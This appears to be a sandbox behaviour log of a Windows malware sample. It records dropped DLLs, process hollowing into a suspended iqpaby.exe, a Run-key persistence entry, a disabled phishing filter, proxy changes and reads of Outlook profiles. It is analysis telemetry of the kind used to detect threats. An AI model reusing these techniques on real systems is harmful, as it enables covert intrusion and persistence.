Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( C:\Users, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( C:\Users\ADMINI~1, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %TEMP%, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: SetFileTime Args: ( 1c, 2017-02-1/13:27:24, NULL, 2017-02-1/13:27:24 ) Return: 1	2552	2644
Call Filesystem API	API Name: SetFileTime Args: ( 1c, 2017-02-1/12:40:32, NULL, 2017-02-1/12:40:32 ) Return: 1	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( C:\Users, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( C:\Users\ADMINI~1, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %TEMP%, 0 ) Return: 0	2552	2644
Call Filesystem API	API Name: CreateDirectoryW Args: ( %TEMP%\nse5AAD.tmp, 0 ) Return: 1	2552	2644
Add File	Path: %TEMP%\Chaptrel.ro Type: VSDT_COM_DOS	2552	2644
Write File	Path: %TEMP%\Chaptrel.ro Type: VSDT_COM_DOS	2552	2644
Add File	Path: %TEMP%\monkshood.dll Type: VSDT_DLL_W32	2552	2644
%TEMP%\monkshood.dll
Add File	Path: %TEMP%\nse5AAD.tmp Type: VSDT_EMPTY	2552	2644
Delete File	Path: %TEMP%\nse5AAD.tmp Type: VSDT_EMPTY	2552	2644
Add File	Path: %TEMP%\nse5AAD.tmp\System.dll Type: VSDT_DLL_W32	2552	2644
Write File	Path: %TEMP%\nse5AAD.tmp\System.dll Type: VSDT_DLL_W32	2552	2644
Call Filesystem API	API Name: DeleteFileW Args: ( %windir%\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2552.1880153 ) Return: 0	2520	2552
Call Filesystem API	API Name: DeleteFileW Args: ( %windir%\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2552.1880153 ) Return: 0	2520	2552
Call Filesystem API	API Name: DeleteFileW Args: ( %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2552.1880168 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e4e4e4, 0, netutils.dll, 729e0000 ) Return: 0	2520	2552
Call Process API	API Name: CreateProcessA Args: ( , "%TEMP%\iqpaby.exe", , , , CREATE_SUSPENDED, , , , Process:2840:%TEMP%\iqpaby.exe ) Return: 1	2552	2644
Call Thread API	API Name: NtGetContextThread Args: ( 560, 3a80000 ) Return: 0	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 400000, MZ., 1024, 0 ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 400000, MZ., 0, 18f1ec ) Return: 0	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 453000, , 5120, 18f1ec ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 452000, , 512, 18f1ec ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 44c000, ., 10752, 18f1ec ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 412000, .., 235520, 18f1ec ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 401000, S...................8_A, 66048, 18f1ec ) Return: 1	2552	2644
Call Virtual Memory API	API Name: WriteProcessMemory Args: ( Modify PEB 7efde000 Process:2840:%TEMP%\iqpaby.exe, 7efde008, , 4, 0 ) Return: 1	2552	2644
Call Thread API	API Name: SetThreadContext Args: ( Process Name:2840:%TEMP%\iqpaby.exe ) Return: 1	2552	2644
Add File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\asiwahiz Type: VSDT_COM_DOS	2644	2840
Write File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\asiwahiz Type: VSDT_COM_DOS	2644	2840
Add File	Path: %windir%\inubaslh.exe Type: VSDT_EXE_W32	2840	1204
Write File	Path: %windir%\inubaslh.exe Type: VSDT_EXE_W32	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ahepoqog Value: "%windir%\inubaslh.exe"	2840	1204
Add File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\ebiwewiz Type: VSDT_COM_DOS	2840	1204
Write File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\ebiwewiz Type: VSDT_COM_DOS	2840	1204
Add File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\ewiwobiz Type: VSDT_COM_DOS	2840	1204
Write File	Path: %ALLUSERSPROFILE%\uwupefovygigylih\ewiwobiz Type: VSDT_COM_DOS	2840	1204
Add Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\ Value: None	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\EnableFileTracing Value: 0	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\EnableConsoleTracing Value: 0	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\FileTracingMask Value: ffff0000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\ConsoleTracingMask Value: ffff0000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\MaxFileSize Value: 100000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASAPI32\FileDirectory Value: %windir%\tracing	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 Value: 0	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 Value: 0	2840	1204
Add Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\ Value: None	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\EnableFileTracing Value: 0	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\EnableConsoleTracing Value: 0	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\FileTracingMask Value: ffff0000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\ConsoleTracingMask Value: ffff0000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\MaxFileSize Value: 100000	2840	1204
Write Registry Key	Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\explorer_RASMANCS\FileDirectory Value: %windir%\tracing	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable Value: 0	2840	1204
Delete Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer Value: None	2840	1204
Delete Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride Value: None	2840	1204
Delete Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL Value: None	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings Value: None	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\SOFTWARE\Classes\Local Settings\MuiCache\9B\52C64B7E\LanguageList Value: en-US\0en\0	2840	1204
Add File	Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS	2840	1204
Add File	Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF	2840	1204
Write File	Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS	2840	1204
Write File	Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS	2840	1204
Delete File	Path: %TEMP%\Cab32A3.tmp Type: VSDT_MSCF	2840	1204
Delete File	Path: %TEMP%\Tar32A4.tmp Type: VSDT_COM_DOS	2840	1204
Add File	Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS	2840	1204
Add File	Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF	2840	1204
Write File	Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS	2840	1204
Write File	Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS	2840	1204
Delete File	Path: %TEMP%\Cab3303.tmp Type: VSDT_MSCF	2840	1204
Delete File	Path: %TEMP%\Tar3304.tmp Type: VSDT_COM_DOS	2840	1204
Read Registry Key	Key: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Value: None	2840	1204
Read Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\ Value: None	2840	1204
Write File	Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 Type: VSDT_MSCF	2840	1204
Write File	Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS	2840	1204
Write File	Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS	2840	1204
Add File	Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS	2840	1204
Add File	Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF	2840	1204
Write File	Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF	2840	1204
Add File	Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS	2840	1204
Write File	Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS	2840	1204
Delete File	Path: %TEMP%\Cab4981.tmp Type: VSDT_MSCF	2840	1204
Delete File	Path: %TEMP%\Tar4982.tmp Type: VSDT_COM_DOS	2840	1204
Write File	Path: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 Type: VSDT_COM_DOS	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecisionReason Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecisionTime Value: None	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadDecision Value: 0	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9AF3054-249D-4592-B2EF-3378C929E9A3}\WpadNetworkName Value: Network 6	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecisionReason Value: 1	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecisionTime Value: None	2840	1204
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\94-00-fd-b0-24-82\WpadDecision Value: 0	2840	1204
Add File	Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII	2840	1204
Write File	Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII	2840	1204
Delete File	Path: %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1C281L5S\plain[1].txt Type: VSDT_ASCII	2840	1204